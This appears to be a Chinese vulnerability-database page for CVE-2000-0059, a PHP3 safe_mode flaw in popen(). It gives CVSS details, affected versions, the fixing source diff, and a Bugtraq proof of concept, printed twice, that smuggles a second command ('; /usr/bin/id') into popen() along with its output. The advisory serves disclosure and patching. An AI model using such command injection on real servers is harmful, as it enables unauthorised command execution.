CVE-2000-0059
CVSS10.0
发布时间 :2000-01-04 00:00:00
修订时间 :2008-09-10 15:02:41
NMCOES    

[原文]PHP3 with safe_mode enabled does not properly filter shell metacharacters from commands that are executed by popen, which could allow remote attackers to execute commands.


[CNNVD]PHP3 'safe_mode'失效漏洞(CNNVD-200001-007)

        含有安全模式的PHP3无法正确地从相关函数执行的命令中过滤shell元字符。远程攻击者可以利用此漏洞执行命令。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:php:php:3.0.13PHP PHP 3.0.13
cpe:/a:php:php:3.0.11PHP PHP 3.0.11
cpe:/a:php:php:3.0.6PHP PHP 3.0.6
cpe:/a:php:php:3.0.2PHP PHP 3.0.2
cpe:/a:php:php:3.0.10PHP PHP 3.0.10
cpe:/a:php:php:3.0.12PHP PHP 3.0.12
cpe:/a:php:php:3.0.5PHP PHP 3.0.5
cpe:/a:php:php:3.0.7PHP PHP 3.0.7
cpe:/a:php:php:3.0.8PHP PHP 3.0.8
cpe:/a:php:php:3.0.1PHP PHP 3.0.1
cpe:/a:php:php:3.0.3PHP PHP 3.0.3
cpe:/a:php:php:3.0.9PHP PHP 3.0.9
cpe:/a:php:php:3.0PHP PHP 3.0
cpe:/a:php:php:3.0.4PHP PHP 3.0.4

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0059
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0059
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200001-007
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/911
(UNKNOWN)  BID  911

- 漏洞信息

PHP3 'safe_mode'失效漏洞
危急 输入验证
2000-01-04 00:00:00 2005-10-20 00:00:00
远程  
        含有安全模式的PHP3无法正确地从相关函数执行的命令中过滤shell元字符。远程攻击者可以利用此漏洞执行命令。

- 公告与补丁

        Index: functions/file.c
        ===================================================================
        RCS file: /repository/php3/functions/file.c,v
        retrieving revision 1.229
        retrieving revision 1.230
        diff -u -r1.229 -r1.230
        --- functions/file.c 2000/01/01 04:31:15 1.229
        +++ functions/file.c 2000/01/03 21:31:31 1.230
        @@ -26,7 +26,7 @@
         | Authors: Rasmus Lerdorf |
         +----------------------------------------------------------------------+
         */
        -/* $Id: file.c,v 1.229 2000/01/01 04:31:15 sas Exp $ */
        +/* $Id: file.c,v 1.230 2000/01/03 21:31:31 kk Exp $ */
         #include "php.h"
        #include
        @@ -51,6 +51,7 @@
         #include "safe_mode.h"
         #include "php3_list.h"
         #include "php3_string.h"
        +#include "exec.h"
         #include "file.h"
         #if HAVE_PWD_H
         #if MSVC5
        @@ -575,7 +576,7 @@
         pval *arg1, *arg2;
         FILE *fp;
         int id;
        - char *p;
        + char *p, *tmp = NULL;
         char *b, buf[1024];
         TLS_VARS;
        @@ -600,7 +601,11 @@
         } else {
         snprintf(buf,sizeof(buf),"/",php3_ini.safe_mode_exec_dir,arg1->value.str.val);
         }
        - fp = popen(buf,p);
        +
        + tmp = _php3_escapeshellcmd(buf);
        + fp = popen(tmp,p);
        + efree(tmp); /* temporary copy, no longer necessary */
        +
         if (!fp) {
         php3_error(E_WARNING,"popen(\"\",\"\") - ",buf,p,strerror(errno));
         RETURN_FALSE;

- 漏洞信息 (19708)

PHP <= 3.0.13 'safe_mode' Failure Vulnerability (EDBID:19708)
php remote
2000-01-04 Verified
0 Kristian Koehntopp
N/A [点击下载]
source: http://www.securityfocus.com/bid/911/info

PHP Version 3.0 is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly.

Because it runs on a webserver and allows for user implemented (and perhaps security relevant) code to be executed on it, PHP has built in a security feature called 'safe_mode' to control executed commands to the webroot environment which PHP operates in.

This is done by forcing any system call which executes shell commands to have their shell commands passed to the EscapeShellCmd() function which ensures the commands do not take place outside the webroot directory. 

Under certain versions of PHP however, the popen() command fails to be applied to the EscapeShellCmd() command and as such users can possibly exploit PHP applications running in 'safe_mode' which make of use of the 'popen' system call.

<?php
$fp = popen("ls -l /opt/bin; /usr/bin/id", "r");
echo "$fp<br>\n";
while($line = fgets($fp, 1024)):
printf("%s<br>\n", $line);
endwhile;
pclose($fp);

phpinfo();
?>

which gave me the following output

1
total 53 
-rwxr-xr-x 1 root root 52292 Jan 3 22:05 ls 
uid=30(wwwrun) gid=65534(nogroup) groups=65534(nogroup) 

and from the configuration values of phpinfo():

safe_mode 0 1		

- 漏洞信息

13628
PHP3 safe_mode Shell Metacharacter Filter Failure
Context Dependent Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

- 时间线

2000-01-03 Unknow
2000-01-03 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

PHP3 'safe_mode' Failure Vulnerability
Input Validation Error 911
Yes No
2000-01-04 12:00:00 2009-07-11 01:56:00
This vulnerability was posted to the Bugtraq mailing list by Kristian Koehntopp <kris@koehntopp.de> on Mon, 3 Jan 2000.

- 受影响的程序版本

PHP PHP 3.0.13
PHP PHP 3.0.12
PHP PHP 3.0.11
PHP PHP 3.0.10
PHP PHP 3.0.9
PHP PHP 3.0.8
PHP PHP 3.0.7
+ Sun 2800 Workgroup NTT/KOBE 2800WGJ-KOBE
PHP PHP 3.0.6
PHP PHP 3.0.5
PHP PHP 3.0.4
PHP PHP 3.0.3
PHP PHP 3.0.2
PHP PHP 3.0.1
PHP PHP 3.0 0

- 漏洞讨论

PHP Version 3.0 is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly.

Because it runs on a webserver and allows for user implemented (and perhaps security relevant) code to be executed on it, PHP has built in a security feature called 'safe_mode' to control executed commands to the webroot environment which PHP operates in.

This is done by forcing any system call which executes shell commands to have their shell commands passed to the EscapeShellCmd() function which ensures the commands do not take place outside the webroot directory.

Under certain versions of PHP however, the popen() command fails to be applied to the EscapeShellCmd() command and as such users can possibly exploit PHP applications running in 'safe_mode' which make of use of the 'popen' system call.

- 漏洞利用

As per the message attached in the 'Credit' section.

&lt;?php
$fp = popen("ls -l /opt/bin; /usr/bin/id", "r");
echo "$fp&lt;br&gt;\n";
while($line = fgets($fp, 1024)):
printf("%s&lt;br&gt;\n", $line);
endwhile;
pclose($fp);

phpinfo();
?&gt;

which gave me the following output

1
total 53
-rwxr-xr-x 1 root root 52292 Jan 3 22:05 ls
uid=30(wwwrun) gid=65534(nogroup) groups=65534(nogroup)

and from the configuration values of phpinfo():

safe_mode 0 1

- 解决方案

Index: functions/file.c
===================================================================
RCS file: /repository/php3/functions/file.c,v
retrieving revision 1.229
retrieving revision 1.230
diff -u -r1.229 -r1.230
--- functions/file.c 2000/01/01 04:31:15 1.229
+++ functions/file.c 2000/01/03 21:31:31 1.230
@@ -26,7 +26,7 @@
| Authors: Rasmus Lerdorf <rasmus@lerdorf.on.ca> |
+----------------------------------------------------------------------+
*/
-/* $Id: file.c,v 1.229 2000/01/01 04:31:15 sas Exp $ */
+/* $Id: file.c,v 1.230 2000/01/03 21:31:31 kk Exp $ */
#include "php.h"

#include <stdio.h>
@@ -51,6 +51,7 @@
#include "safe_mode.h"
#include "php3_list.h"
#include "php3_string.h"
+#include "exec.h"
#include "file.h"
#if HAVE_PWD_H
#if MSVC5
@@ -575,7 +576,7 @@
pval *arg1, *arg2;
FILE *fp;
int id;
- char *p;
+ char *p, *tmp = NULL;
char *b, buf[1024];
TLS_VARS;

@@ -600,7 +601,11 @@
} else {
snprintf(buf,sizeof(buf),"%s/%s",php3_ini.safe_mode_exec_dir,arg1->value.str.val);
}
- fp = popen(buf,p);
+
+ tmp = _php3_escapeshellcmd(buf);
+ fp = popen(tmp,p);
+ efree(tmp); /* temporary copy, no longer necessary */
+
if (!fp) {
php3_error(E_WARNING,"popen(\"%s\",\"%s\") - %s",buf,p,strerror(errno));
RETURN_FALSE;

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站